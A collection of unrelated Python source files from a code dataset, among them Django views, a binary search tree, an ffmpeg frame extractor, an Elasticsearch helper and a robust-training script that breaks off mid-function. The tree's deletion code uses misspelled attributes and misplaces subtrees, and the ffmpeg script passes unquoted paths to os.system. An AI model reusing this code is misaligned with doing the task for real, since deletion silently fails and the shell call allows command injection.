secondsElapsed(message.created_at) > 30*60:\n #quit because it is not possible to erase comment after 30mins\n print(\"Didn't erase message (posted more than 30mins ago!)\")\n if \"tipo\" in request.POST: #js\n response[\"deleted\"] = False\n return JsonResponse(response)\n else:\n url = f\"/wall#divmessage-{idMsg}\"\n return redirect(url)\n\n if message.user.id == int(request.session[\"id\"]): #chk que mensaje corresponde al usuario loggeado\n message.delete()\n print(f\"Message {idMsg} deleted!\")\n response[\"deleted\"] = True\n\n if \"tipo\" in request.POST: #js\n print(\"by ajax\")\n return JsonResponse(response)\n else:\n print(\"by server\")\n return redirect(f\"/users/show/{request.POST['id_for']}\")\n \n\ndef delComment(request):\n \n idCom = request.POST[\"comment_id\"]\n comment = Comment.objects.get(id = idCom)\n\n response = {}\n\n if secondsElapsed(comment.created_at) > 30*60:\n #quit because it is not possible to erase comment after 30mins\n print(\"Didn't erased comment (posted more than 30mins ago!)\")\n if \"tipo\" in request.POST: #js\n response[\"deleted\"] = False\n return JsonResponse(response)\n else:\n url = f\"/wall#divcomment-{idCom}\"\n return redirect(url)\n\n if comment.user.id == int(request.session[\"id\"]): #chk que mensaje corresponde al usuario loggeado\n comment.delete()\n print(f\"Comment {idCom} deleted!\")\n response[\"deleted\"] = True\n\n if \"tipo\" in request.POST: #js\n print(\"by ajax\")\n return JsonResponse(response)\n else:\n print(\"by server\")\n return redirect(f\"/users/show/{request.POST['id_for']}\")\n\ndef getMsgComCreatedAt(request):\n #necesito: la diferencia de created_at, username\n response = {}\n response[\"comments\"] = {}\n response[\"messages\"] = {}\n\n messages = Message.objects.all()\n for msg in messages:\n response[\"messages\"][str(msg.id)] = {\n \"created_at\" : created_at_msg(msg.created_at),\n \"minutes\" : minutesElapsed(msg.created_at),\n }\n\n comments = Comment.objects.all()\n for com in comments:\n response[\"comments\"][str(com.id)] = {\n \"created_at\" : created_at_msg(com.created_at),\n \"minutes\" : minutesElapsed(com.created_at),\n }\n\n return 
JsonResponse(response)\n\n","sub_path":"apps/wallApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"327969063","text":"# ----------------------------------------------------------------------------\n# Nombre: Compilador\n# Autor: Cabral Torres Jorge\n# Profesor: Ana Millan\n# Clase: Lenguaje y automatas 1\n# Creado: 13 abril del 2020\n# Copyright: (c) 2020 by Cabral Torres Jorge\n# ----------------------------------------------------------------------------\n\nfrom lexico import Lexico\nfrom sintactico import Sintactico\nfrom assembly import Assembly\n\nlexico = Lexico()\nlexico.lexico()\nif lexico.errorEncontrado != True:\n print(\"\\n---Analisis lexico terminado---\")\n sintaxis = Sintactico(lexico.cabeza)\n if sintaxis.errorEncontrado != True:\n print(\"\\n---Analisis Sintactico terminado---\")\n for d in sintaxis.dicTypeofvariable:\n print(d,\"-->\",sintaxis.dicTypeofvariable[d])\n assembly = Assembly(sintaxis.polishList, sintaxis.dicTypeofvariable)\n\n \n\n ","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"493113261","text":"#!/usr/bin/env python\n#filename=area_x\n#---------------------------------------by Gao John\n\nfrom __future__ import division\nfrom pylab import *\nimport pyfits\n#from sys import argv\n#from string import atoi,atof\nfrom matplotlib.axes import Axes#\nfrom mpl_toolkits.axes_grid1.axes_divider import make_axes_locatable#\nimport pywcsgrid2\n\n#function setup_axes()\ndef setup_axes():\n ax = pywcsgrid2.subplot(111, header=x_header)\n\n #add colorbar axes\n divider = make_axes_locatable(ax)\n cax = divider.new_horizontal(\"5%\", pad=0.1, axes_class=Axes)\n fig.add_axes(cax)\n\n return ax, cax\n\n#================================================\n#x file: kes 41\nfile_x = pyfits.open('..//xmm//adapt-2000-6000_smaller.fits')\n\nx_data = file_x[0].data\nx_header = file_x[0].header\n(ny,nx) = x_data.shape\n#=================================================\n#radio file: kes 41\nfile_radio = pyfits.open('..//most//MOS336p5_smaller_fk5.fits')\nradio_data = file_radio[0].data\nradio_header = file_radio[0].header\n\n#==================================================\n#============================================\n#prepare figure & axes\nfig = figure(1)\nax, cax = setup_axes()\n\n#draw image\n#x_data=x_data[5:ny-1,0:nx-1]\nim = ax.imshow(x_data, cmap=cm.Purples_r, origin=\"lower\", interpolation='none')\n#im.set_clim()\n\n#draw contour\ncont = ax[radio_header].contour(radio_data, levels=arange(0.,1.2,0.1), colors=\"y\", alpha=0.5)\n\nfor col in cont.collections:\n col.set_linewidth(0.5)\n\ncbar = colorbar(im, cax=cax)\n\n#adjust colorbar ticks and add levels for contour lines\n#cbar.set_ticks()\n#cbar.add_lines(cont)\n#labels\ncax.set_ylabel(\"Jy/Beam\")\n\n#ax.set(xlim=(0,nx-1), ylim=(5,ny-1))\nax.set_xlabel(\"Right Ascension (J2000)\")\nax.set_ylabel(\"Declination (J2000)\")\n#show()\n\n#imshow(co_after_cut)\n#colorbar()\n#cont = ax[radio_header].contour(radio_data)\nfnames = 'area_x.eps'\n#ax.set_rasterization_zorder(2.1)\n#cax.set_rasterization_zorder(2.1)\nsavefig(fnames, bbox_inches=\"tight\")\n","sub_path":"area_x.py","file_name":"area_x.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} 
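The wall-app record above turns a timedelta into its Spanish "Posteado hace ..." labels by bucketing elapsed seconds (<2 min, <1 h, <24 h, otherwise a full date). A minimal, framework-free sketch of that bucketing follows; it is an illustration, not the record's code — the name humanize_elapsed and the injectable now argument are hypothetical, added so the thresholds can be exercised without Django's timezone.now().

from datetime import datetime, timedelta

def humanize_elapsed(posted_at, now=None):
    # Buckets mirror created_at_msg(): <2 min, <1 h, <24 h, else a date stamp.
    now = now or datetime.now()
    seconds = (now - posted_at).total_seconds()
    if seconds < 120:
        return "Posteado hace 1 minuto"
    if seconds < 3600:
        return f"Posteado hace {int(seconds // 60)} minutos"
    if seconds < 24 * 3600:
        hours, rest = divmod(seconds, 3600)
        hours, minutes = int(hours), int(rest // 60)
        unit = "hora" if hours == 1 else "horas"
        if minutes and hours < 4:
            return f"Posteado hace {hours} {unit} y {minutes} minutos"
        return f"Posteado hace {hours} {unit}"
    return posted_at.strftime("Posteado el %d-%m-%Y a las %H:%M")

if __name__ == "__main__":
    t0 = datetime(2020, 1, 1, 12, 0)
    print(humanize_elapsed(t0, now=t0 + timedelta(minutes=5)))            # hace 5 minutos
    print(humanize_elapsed(t0, now=t0 + timedelta(hours=2, minutes=10)))  # hace 2 horas y 10 minutos
    print(humanize_elapsed(t0, now=t0 + timedelta(days=3)))               # Posteado el 01-01-2020 a las 12:00

Injecting now keeps the bucket boundaries unit-testable, which the original's direct timezone.now() calls do not allow.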
+{"seq_id":"83623566","text":"class TreeNode:\n\n def __init__(self, key, val, left=None, right=None, parent=None) -> None:\n self.key = key\n self.payload = val\n self.left_child = left\n self.right_child = right\n self.parent = parent\n\n @property\n def has_left_child(self) -> bool:\n return bool(self.left_child)\n\n @property\n def has_right_child(self) -> bool:\n return bool(self.right_child)\n\n @property\n def is_left_child(self) -> bool:\n return self.parent and self.parent.left_child == self\n\n @property\n def is_right_child(self) -> bool:\n return self.parent and self.parent.right_child == self\n\n @property\n def is_root(self) -> bool:\n return not self.parent\n\n @property\n def is_leaf(self) -> bool:\n return not (self.right_child or self.left_child)\n\n @property\n def has_any_children(self) -> bool:\n return self.right_child or self.left_child\n\n @property\n def has_both_children(self) -> bool:\n return self.right_child and self.left_child\n\n def replace_node_data(self, key, val, lc, rc) -> None:\n self.key = key\n self.payload = val\n self.left_child = lc\n self.right_child = rc\n if self.has_left_child:\n self.left_child.parent = self\n if self.has_right_child:\n self.right_child.parent = self\n\n def find_successor(self):\n succ = None\n if self.has_right_child:\n succ = self.right_child.find_min()\n else:\n if self.parent:\n if self.is_left_child:\n succ = self.parent\n else:\n self.parent.right_child = None\n succ = self.parent.find_successor()\n self.parent.right_child = self\n return succ\n\n def find_min(self):\n current = self\n while current.has_left_child:\n current = current.left_child\n return current\n\n def splice_out(self):\n if self.is_leaf:\n if self.is_left_child:\n self.parent.left_child = None\n else:\n self.parent.right_child = None\n elif self.has_any_children:\n if self.has_left_child:\n if self.is_left_child:\n self.parent.left_child = self.left_child\n else:\n self.parent.right_child = self.left_child\n self.left_child.parent = self.parent\n else:\n if self.is_left_child:\n self.parent.leftChild = self.right_child\n else:\n self.parent.rightChild = self.right_child\n self.right_child.parent = self.parent\n\n def __iter__(self):\n if self:\n if self.has_left_child:\n for elem in self.left_child:\n yield elem\n yield self.key\n if self.has_right_child:\n for elem in self.right_child:\n yield elem\n\n\nclass BinarySearchTree:\n\n def __init__(self) -> None:\n self.root = None\n self.size = 0\n\n def length(self):\n return self.size\n\n def __len__(self):\n return self.size\n\n def __iter__(self):\n return self.root.__iter__()\n\n def _put(self, key, val, current_node: TreeNode) -> None:\n if key < current_node.key:\n if current_node.has_left_child:\n self._put(key, val, current_node.left_child)\n else:\n current_node.left_child = TreeNode(key, val, parent=current_node)\n else:\n if current_node.has_right_child:\n self._put(key, val, current_node.right_child)\n else:\n current_node.right_child = TreeNode(key, val, parent=current_node)\n\n def put(self, key, val) -> None:\n if self.root:\n self._put(key, val, self.root)\n else:\n self.root = TreeNode(key, val)\n self.size += 1\n\n def __setitem__(self, key, value):\n self.put(key, value)\n\n def get(self, key):\n if self.root:\n res = self._get(key, self.root)\n if res:\n return res.payload\n return None\n\n def _get(self, key, current_node: TreeNode):\n if not current_node:\n return None\n elif current_node.key == key:\n return current_node\n elif key < current_node.key:\n return self._get(key, 
current_node.left_child)\n else:\n return self._get(key, current_node.right_child)\n\n def __getitem__(self, item):\n return self.get(item)\n\n def __contains__(self, item) -> bool:\n if self._get(item, self.root):\n return True\n return False\n\n def delete(self, key):\n if self.size > 1:\n node_to_remove = self._get(key, self.root)\n if node_to_remove:\n self.remove(node_to_remove)\n self.size -= 1\n else:\n raise KeyError(f\"Error, key: {key} not in tree\")\n elif self.size == 1 and self.root.key == key:\n self.root = None\n self.size -= 1\n else:\n raise KeyError(f\"Error, key: {key} not in tree\")\n\n def __delitem__(self, key):\n self.delete(key)\n\n def remove(self, current_node: TreeNode):\n if current_node.is_leaf:\n if current_node == current_node.parent.left_child:\n current_node.parent.left_child = None\n else:\n current_node.parent.right_child = None\n elif current_node.has_both_children:\n succ = current_node.find_successor()\n succ.splice_out()\n current_node.key = succ.key\n current_node.payload = succ.payload\n else: # this node has one child\n if current_node.has_left_child:\n if current_node.is_left_child:\n current_node.left_child.parent = current_node.parent\n current_node.parent.left_child = current_node.left_child\n elif current_node.is_right_child:\n current_node.left_child.parent = current_node.parent\n current_node.parent.left_child = current_node.left_child\n else:\n current_node.replace_node_data(current_node.left_child.key,\n current_node.left_child.payload,\n current_node.left_child.left_child,\n current_node.left_child.right_child)\n else:\n if current_node.is_left_child:\n current_node.right_child.parent = current_node.parent\n current_node.parent.left_child = current_node.right_child\n elif current_node.is_right_child:\n current_node.right_child.parent = current_node.parent\n current_node.parent.right_child = current_node.right_child\n else:\n current_node.replace_node_data(current_node.right_child.key,\n current_node.right_child.payload,\n current_node.right_child.left_child,\n current_node.right_child.right_child)\n\n\nif __name__ == \"__main__\":\n mytree = BinarySearchTree()\n mytree[3] = \"red\"\n mytree[4] = \"blue\"\n mytree[6] = \"yellow\"\n mytree[2] = \"at\"\n\n print(mytree[6])\n print(mytree[2])\n del mytree[2]\n print(mytree[4])\n","sub_path":"lesson27/lesson27_1.py","file_name":"lesson27_1.py","file_ext":"py","file_size_in_byte":7648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"45148986","text":"#LANGLADE Maxime\n#16/04/20\nimport os\nfrom math import floor\nfrom os.path import join\nimport argparse\nimport subprocess\nimport cv2\nimport random\nimport glob\n\nfrom tqdm import tqdm\n\ndef extract_I_frames(video_path, output_path):\n\n\t#video_path = \"/Volumes/VERBATIM\\ HD/\" + video_path[21:]\n\t#print(\"V_P =\", video_path)\n\n\tos.makedirs(output_path, exist_ok=True)\n\n\n\tout_file = join(output_path, '%03d.png')\n\tselect_cmd = \" -f image2 -vf \" + '''\"select='eq(pict_type,PICT_TYPE_B)'\"'''\n\t#select_cmd = \" -f image2 -vf \" + '''\"select='eq(pict_type,B)'\"'''\n\tcmd = \"ffmpeg -i \" + video_path + select_cmd + \" -vsync vfr \" + out_file\n\t\n\tos.system(cmd) \n\n\ndef process(data_path):\n\t#video_list_path = '/Volumes/VERBATIM_HD/Stage_Maxime/Celeb-DF-v2/deep/test'\n\t#video_list = glob.glob(join(video_list_path, 'id*'))\n\n\t#video_to_process = []\n\t#for video_path in video_list:\n\t#\tname = video_path.split('.')[0]\n\t#\tname = 
name.split('/')[-1]\n\t#\tvideo_to_process.append(name)\n\n\tvideo_path = join(data_path, \"videos\")\n\timages_path = join(data_path, \"images\", \"B\")\n\n\tvideo_list = glob.glob(join(video_path, 'gen_*'))\n\t#video_list = [video_list_orig, video_list_fake]\n\n\tprint(video_list)\n\n\n\tos.makedirs(images_path, exist_ok=True)\n\n\n\t#video_in_folder = glob.glob(join(videos_path, generic_video_name))\n\n\t#nb_video_in_folder = len(video_to_process)\n\n\tfor video in tqdm(video_list):\n\t\tvideo_name = video.split('.')[0]\n\t\tvideo_name = video_name.split('/')[-1]\n\t\toutput_folder = join(images_path, video_name)\n\t\textract_I_frames(video, output_folder)\n\n\nif __name__ == '__main__':\n\tp = argparse.ArgumentParser(\n\t\tformatter_class=argparse.ArgumentDefaultsHelpFormatter\n\t)\n\tp.add_argument('--data_path','-p' , type=str)\n\targs = p.parse_args()\n\n\tprocess(**vars(args))","sub_path":"I_P_Compare/frame_extraction_gen.py","file_name":"frame_extraction_gen.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"174857505","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('adopteitor_core', '0004_auto_20160326_2023'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='animal',\n name='etapa',\n field=models.CharField(default='a', max_length=1, choices=[(b'c', b'cachorro'), (b'a', b'adulto')]),\n preserve_default=False,\n ),\n ]\n","sub_path":"adopteitor_core/migrations/0005_animal_etapa.py","file_name":"0005_animal_etapa.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"171209206","text":"import random\nclass Matrix:\n def __init__(self,r,c):\n self.rows = r\n self.cols = c\n self.data = []\n for i in range(r):\n self.data.append([])\n for j in range(c):\n self.data[i].append(0)\n\n def random(self):\n for i in range(self.rows):\n for j in range(self.cols):\n self.data[i][j] = random.random()\n\n\n def display(self):\n for i in range(self.rows):\n for j in range(self.cols):\n print(self.data[i][j],end = ' ')\n print()\n print()\n\n\n def addScalar(self,n):\n for i in range(self.rows):\n for j in range(self.cols):\n self.data[i][j] += n\n\n\n @staticmethod\n def add(m1,m2):\n res = Matrix(m1.rows,m1.cols)\n for i in range(m1.rows):\n for j in range(m1.cols):\n res.data[i][j] = m1.data[i][j] + m2.data[i][j]\n return res\n \n def mulScalar(self,n):\n for i in range(self.rows):\n for j in range(self.cols):\n self.data[i][j] *= n\n \n @staticmethod\n def multiply(m1,m2):\n res = Matrix(m1.rows,m2.cols)\n for i in range(m1.rows):\n for j in range(m2.cols):\n for k in range(m1.cols):\n res.data[i][j] += m1.data[i][k]*m2.data[k][j]\n return res\n \n def multiplyElementWise(self,m1):\n for i in range(self.rows):\n for j in range(self.cols):\n self.data[i][j] *= m1.data[i][j]\n \n def set(self,a):\n for i in range(self.rows):\n for j in range(self.cols):\n self.data[i][j] = a[i][j]\n \n def setArray(self,a):\n for i in range(self.rows):\n self.data[i][0] = a[i]\n return self\n \n def transpose(self):\n res = Matrix(self.cols,self.rows)\n for i in range(res.rows):\n for j in range(res.cols):\n res.data[i][j] = self.data[j][i]\n return res\n \n @staticmethod\n def map(mat,fn):\n res = Matrix(mat.rows,mat.cols)\n for i in range(mat.rows):\n for j in 
range(mat.cols):\n res.data[i][j] = fn(mat.data[i][j])\n return res\n \n @staticmethod\n def copy(source):\n res = Matrix(source.rows,source.cols)\n for i in range(source.rows):\n for j in range(source.cols):\n res.data[i][j] = source.data[i][j]\n return res","sub_path":"Neural Network/Matrix.py","file_name":"Matrix.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"653992540","text":"from django.urls import path\nfrom . import views\n\napp_name = 'member'\n\nurlpatterns = [\n path('',views.login,name='login'),\n path('create/', views.create,name='create'),\n path('update/', views.update,name='update'),\n path('delete/', views.delete,name='delete'),\n path('logout/', views.logout,name='logout'),\n path('confirmemail/',views.confirmemail,name='confirmemail'),\n path('index/',views.index,name='index'),\n path('profile/',views.profile,name='profile'),\n path('order/',views.order,name='order')\n]","sub_path":"member/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"623062805","text":"from db.factory import BasicFactory\nfrom elasticsearch import Elasticsearch, helpers, exceptions\nfrom util import get_params, set_logger\nimport json\n\nbf = BasicFactory()\nconfig = get_params()\nlogger = set_logger('elastic')\n\nes = Elasticsearch(hosts=[{\n 'host': config['elastic']['host'],\n 'port': config['elastic']['port']\n}])\n\n\nclass Elastic:\n INDEX = config['elastic']['index']\n\n def search(self, name):\n \"\"\"\n Autocomplete for movies\n\n :param str name: prefix from search\n :return: movies\n :rtype: dict\n \"\"\"\n message = {'status': False}\n query = {\n 'suggest': {\n 'movie': {\n 'prefix': name,\n 'completion': {\n 'field': 'name',\n 'size': 10\n }\n }\n }\n }\n # if status code is not equal to 200\n try:\n response = es.search(\n index=self.INDEX,\n body=query\n )\n except BaseException:\n return json.dumps(message)\n\n options = response['suggest']['movie'][0]['options']\n\n if response['timed_out'] or len(options) == 0:\n return json.dumps(message)\n\n # similar movie names and movies year\n movies = []\n\n for item in options:\n source = item['_source']\n data = {\n 'id': item['_id'],\n 'text': ' '.join(source['name']['input']),\n 'value': source['year'],\n }\n movies.append(data)\n\n message['status'] = True\n message['movies'] = movies[:10]\n\n return json.dumps(message)\n\n def insert_elastic(self):\n \"\"\"\n Insert records to elastic\n\n :return: difference between inserted and sent\n :rtype: int\n \"\"\"\n items = bf.get_items()\n\n actions = []\n\n for item in items:\n action = {\n '_index': self.INDEX,\n '_id': item[0],\n '_source': {\n 'name': {\n 'input': item[1].split(),\n 'weight': int(item[3])\n },\n 'year': item[2],\n },\n }\n actions.append(action)\n\n response = helpers.bulk(es, actions)\n warnings = len(items) - response[0]\n\n if warnings > 0:\n logger.warn(f'An error occurred for {warnings} items')\n\n @staticmethod\n def create_index():\n \"\"\"\n Create index in elastic\n\n :return: status of request\n :rtype: bool\n \"\"\"\n request_body = {\n 'settings': {\n 'number_of_shards': 3,\n 'number_of_replicas': 1\n },\n 'mappings': {\n 'properties': {\n 'name': {\n 'type': 'completion',\n 'preserve_separators': False,\n 'preserve_position_increments': False\n },\n 'year': {\n 'type': 'integer',\n 'index': False\n }\n }\n }\n }\n\n try:\n 
es.indices.create(\n index=config['elastic']['index'],\n body=request_body\n )\n except exceptions.RequestError as e:\n if e.args[1] == 'resource_already_exists_exception':\n logger.warn('Index already exists')\n return\n\n logger.exception(e.args)\n","sub_path":"util/elastic.py","file_name":"elastic.py","file_ext":"py","file_size_in_byte":3642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"524838578","text":"import functions\r\nimport requests\r\nimport discord\r\nimport random\r\nfrom discord.ext import commands\r\nfrom discord_components import DiscordComponents, Button, ButtonStyle, InteractionType\r\n\r\n\r\nclass Economy(commands.Cog):\r\n def __init__(self, client):\r\n self.client = client\r\n self.session = {}\r\n DiscordComponents(client)\r\n\r\n @commands.command()\r\n async def unbox(self, ctx):\r\n functions.log(ctx.guild.name, ctx.author, ctx.command)\r\n session = random.randint(0, 999999)\r\n self.session[ctx.author.id] = session\r\n\r\n em = discord.Embed(\r\n title=\"Choose a reward!\",\r\n color=0x2f3136\r\n )\r\n\r\n await ctx.send(\r\n embed=em,\r\n components=[\r\n [\r\n Button(style=ButtonStyle.red, label=\"1\"),\r\n Button(style=ButtonStyle.red, label=\"2\"),\r\n Button(style=ButtonStyle.red, label=\"3\")\r\n ]\r\n ]\r\n )\r\n\r\n @unbox.error\r\n async def on_command_error(self, ctx, error):\r\n raise error\r\n\r\n\r\ndef setup(client):\r\n client.add_cog(Economy(client))\r\n","sub_path":"cogs/economy.py","file_name":"economy.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"57944731","text":"import argparse, random, pickle, os, pdb, time\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom examples.language.data_utils import load_data, get_batches\nfrom examples.language.Transformer.BERT import BERT\nfrom examples.language.lstm import LSTM\nfrom auto_LiRPA.utils import AverageMeter, logger\nfrom auto_LiRPA.perturbations import PerturbationLpNorm, PerturbationSynonym\nfrom auto_LiRPA.bound_general import BoundGeneral\nfrom pytorch_pretrained_bert.optimization import BertAdam\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"--train\", action=\"store_true\")\nparser.add_argument(\"--robust\", action=\"store_true\")\nparser.add_argument(\"--oracle\", action=\"store_true\")\nparser.add_argument(\"--dir\", type=str, default=\"model\")\nparser.add_argument(\"--data\", type=str, default=\"sst\", choices=[\"sst\"])\nparser.add_argument(\"--seed\", type=int, default=0)\nparser.add_argument(\"--device\", type=str, default=\"cuda\", choices=[\"cuda\", \"cpu\"])\n\nparser.add_argument(\"--ptb\", type=str, default=\"synonym\", \n choices=[\"synonym\"])\nparser.add_argument(\"--eps\", type=float, default=0.01)\nparser.add_argument(\"--budget\", type=int, default=3)\nparser.add_argument(\"--verbose_bound\", action=\"store_true\")\nparser.add_argument(\"--ibp\", action=\"store_true\")\nparser.add_argument(\"--kappa\", type=float, default=0.8)\nparser.add_argument(\"--check\", action=\"store_true\")\nparser.add_argument(\"--method\", type=str, default=\"None\",\n choices=[None, \"forward\", \"backward\"])\nparser.add_argument(\"--res_file\", type=str, default=None)\n\nparser.add_argument(\"--model\", type=str, default=\"transformer\",\n choices=[\"transformer\", \"lstm\"])\nparser.add_argument(\"--num_epochs\", type=int, default=20) 
\nparser.add_argument(\"--num_epochs_all_nodes\", type=int, default=5) \nparser.add_argument(\"--num_epochs_warmup\", type=int, default=1) \nparser.add_argument(\"--log_interval\", type=int, default=10)\nparser.add_argument(\"--min_word_freq\", type=int, default=2)\nparser.add_argument(\"--use_bert\", action=\"store_true\")\nparser.add_argument(\"--batch_size\", type=int, default=32)\nparser.add_argument(\"--oracle_batch_size\", type=int, default=256)\nparser.add_argument(\"--gradient_accumulation_steps\", type=int, default=1)\nparser.add_argument(\"--max_sent_length\", type=int, default=32)\nparser.add_argument(\"--vocab_size\", type=int, default=50000)\nparser.add_argument(\"--lr\", type=float, default=1e-4)\nparser.add_argument(\"--grad_clip\", type=float, default=None)\nparser.add_argument(\"--num_labels\", type=int, default=2) \nparser.add_argument(\"--num_layers\", type=int, default=1)\nparser.add_argument(\"--num_attention_heads\", type=int, default=4)\nparser.add_argument(\"--hidden_size\", type=int, default=64) # 256\nparser.add_argument(\"--embedding_size\", type=int, default=64) # 256\nparser.add_argument(\"--intermediate_size\", type=int, default=128) # 512\nparser.add_argument(\"--hidden_act\", type=str, default=\"relu\")\nparser.add_argument(\"--layer_norm\", type=str, default=\"no_var\",\n choices=[\"standard\", \"no\", \"no_var\"])\n\nargs = parser.parse_args() \n\ndef build_perturbation():\n if args.ptb == \"lp_norm\":\n return PerturbationLpNorm(norm=np.inf, eps=args.eps) \n elif args.ptb == \"synonym\":\n return PerturbationSynonym(budget=args.budget)\n else:\n raise NotImplementedError\n\ndef scale_gradients(optimizer, gradient_accumulation_steps): \n parameters = []\n for param_group in optimizer.param_groups:\n for param in param_group[\"params\"]:\n parameters.append(param)\n if param.grad is not None:\n param.grad.data /= gradient_accumulation_steps\n if args.grad_clip is not None:\n torch.nn.utils.clip_grad_norm_(parameters, args.grad_clip)\n \ndef convert(model, ptb, batch, verbose=False):\n model.train()\n embeddings, mask, _, _ = model.get_input(batch)\n converted_model = BoundGeneral(\n model.model_from_embeddings, (embeddings, mask), verbose=verbose) \n converted_model.eval()\n model.model_from_embeddings.eval()\n model.model_from_embeddings = converted_model\n\ndef step(model, ptb, batch, eps=1.0, train=False):\n model_bound = model.model_from_embeddings\n if train:\n model.train()\n grad = torch.enable_grad()\n else:\n model.eval()\n grad = torch.no_grad()\n\n with grad:\n embeddings, mask, tokens, label_ids = model.get_input(batch)\n logits = model_bound(embeddings, mask)\n\n if args.robust and eps > 1e-9:\n C = torch.eye(args.num_labels).to(model.device).unsqueeze(0).repeat(len(batch), 1, 1)\n if args.ptb.find(\"lp_norm\") != -1:\n x = embeddings\n else:\n x = (embeddings, tokens, batch)\n\n start_time = time.time()\n ptb.set_eps(eps)\n logits_l, logits_u = model_bound.compute_bounds(\n ptb=ptb, x=x, C=C, IBP=args.ibp, forward=True, method=args.method)\n if args.check:\n # possible when there is no available perturbation\n try:\n assert(torch.min(logits - logits_l) > -1e-3)\n assert(torch.min(logits_u - logits) > -1e-3)\n except:\n pdb.set_trace()\n one_hot = F.one_hot(label_ids, num_classes=args.num_labels)\\\n .to(torch.float32).to(model.device)\n logits_robust = logits_l * one_hot + logits_u * (1. 
- one_hot)\n else:\n logits_robust = logits\n \n loss_fct = nn.CrossEntropyLoss()\n\n preds = torch.argmax(logits, dim=1)\n acc = torch.sum((preds == label_ids).to(torch.float32)) / len(batch)\n loss = loss_fct(logits, label_ids)\n loss_all = loss\n\n if args.robust:\n preds_robust = torch.argmax(logits_robust, dim=1)\n acc_robust = torch.sum((preds_robust == label_ids).to(torch.float32)) / len(batch)\n loss_robust = loss_fct(logits_robust, label_ids)\n loss_all = args.kappa * loss_robust + (1. - args.kappa) * loss_all\n else:\n acc_robust, loss_robust = acc * 0., loss * 0.\n\n if train:\n loss_all.backward()\n\n acc, loss = acc.detach(), loss.detach()\n acc_robust, loss_robust = acc_robust.detach(), loss_robust.detach()\n\n return acc, loss, acc_robust, loss_robust\n\ndef oracle(model, ptb, data, type):\n logger.info(\"Running oracle for {}\".format(type))\n model.eval()\n assert(isinstance(ptb, PerturbationSynonym))\n cnt_cor = 0\n word_embeddings = model.word_embeddings.weight\n vocab = model.vocab \n for t, example in enumerate(data):\n embeddings, mask, tokens, label_ids = model.get_input([example])\n candidates = ptb.substitution[example[\"sentence\"]]\n if tokens[0][0] == \"[CLS]\":\n candidates = [[]] + candidates + [[]] \n embeddings_all = []\n def dfs(tokens, embeddings, budget, index):\n if index == len(tokens):\n embeddings_all.append(embeddings.cpu())\n return\n dfs(tokens, embeddings, budget, index + 1)\n if budget > 0 and tokens[index] != \"[UNK]\" and len(candidates[index]) > 0\\\n and tokens[index] == candidates[index][0][0]:\n for w in candidates[index][1:]:\n if w[0] in vocab:\n _embeddings = torch.cat([\n embeddings[:index],\n (embeddings[index] \\\n - word_embeddings[vocab[tokens[index]]]\\\n + word_embeddings[vocab[w[0]]]\n ).unsqueeze(0),\n embeddings[index + 1:]\n ], dim=0)\n dfs(tokens, _embeddings, budget - 1, index + 1)\n dfs(tokens[0], embeddings[0], ptb.budget, 0)\n cor = True\n for embeddings in get_batches(embeddings_all, args.oracle_batch_size):\n embeddings_tensor = torch.cat(embeddings).cuda().reshape(len(embeddings), *embeddings[0].shape)\n logits = model.model_from_embeddings(embeddings_tensor, mask) \n for pred in list(torch.argmax(logits, dim=1)):\n if pred != example[\"label\"]:\n cor = False\n if not cor: break\n cnt_cor += cor\n\n if (t + 1) % args.log_interval == 0:\n logger.info(\"{} {}/{}: oracle robust acc {:.3f}\".format(type, t + 1, len(data), cnt_cor * 1. / (t + 1)))\n logger.info(\"{}: oracle robust acc {:.3f}\".format(type, cnt_cor * 1. 
/ (t + 1)))\n    \ndata_train_warmup, data_train, data_dev, data_test = load_data(args.data)\nlogger.info(\"Dataset sizes: {}/{}/{}/{}\".format(\n    len(data_train_warmup), len(data_train), len(data_dev), len(data_test)))\n\nrandom.seed(args.seed)\nnp.random.seed(args.seed)\ntorch.manual_seed(args.seed)\ntorch.cuda.manual_seed_all(args.seed)\n\nif args.model == \"transformer\":\n    model = BERT(args, data_train)\nelif args.model == \"lstm\":\n    model = LSTM(args, data_train)\n\ndev_batches = get_batches(data_dev, args.batch_size)\ntest_batches = get_batches(data_test, args.batch_size) \n\nptb = build_perturbation()\nconvert(model, ptb, dev_batches[0], verbose=args.verbose_bound)\nptb.model = model\noptimizer = model.build_optimizer()\nlogger.info(\"Model converted to support bounds\")\n\navg_acc, avg_loss, avg_acc_robust, avg_loss_robust = [AverageMeter() for i in range(4)]\n\ndef train(epoch):\n    assert(optimizer is not None)\n    if epoch <= args.num_epochs_all_nodes:\n        train_batches = get_batches(data_train_warmup, args.batch_size)\n    else:\n        train_batches = get_batches(data_train, args.batch_size)\n    avg_acc.reset()\n    avg_loss.reset()\n    avg_acc_robust.reset()\n    avg_loss_robust.reset() \n    if args.robust:\n        eps_inc_per_step = 1.0 / (args.num_epochs_warmup * len(train_batches))\n    for i, batch in enumerate(train_batches):\n        if 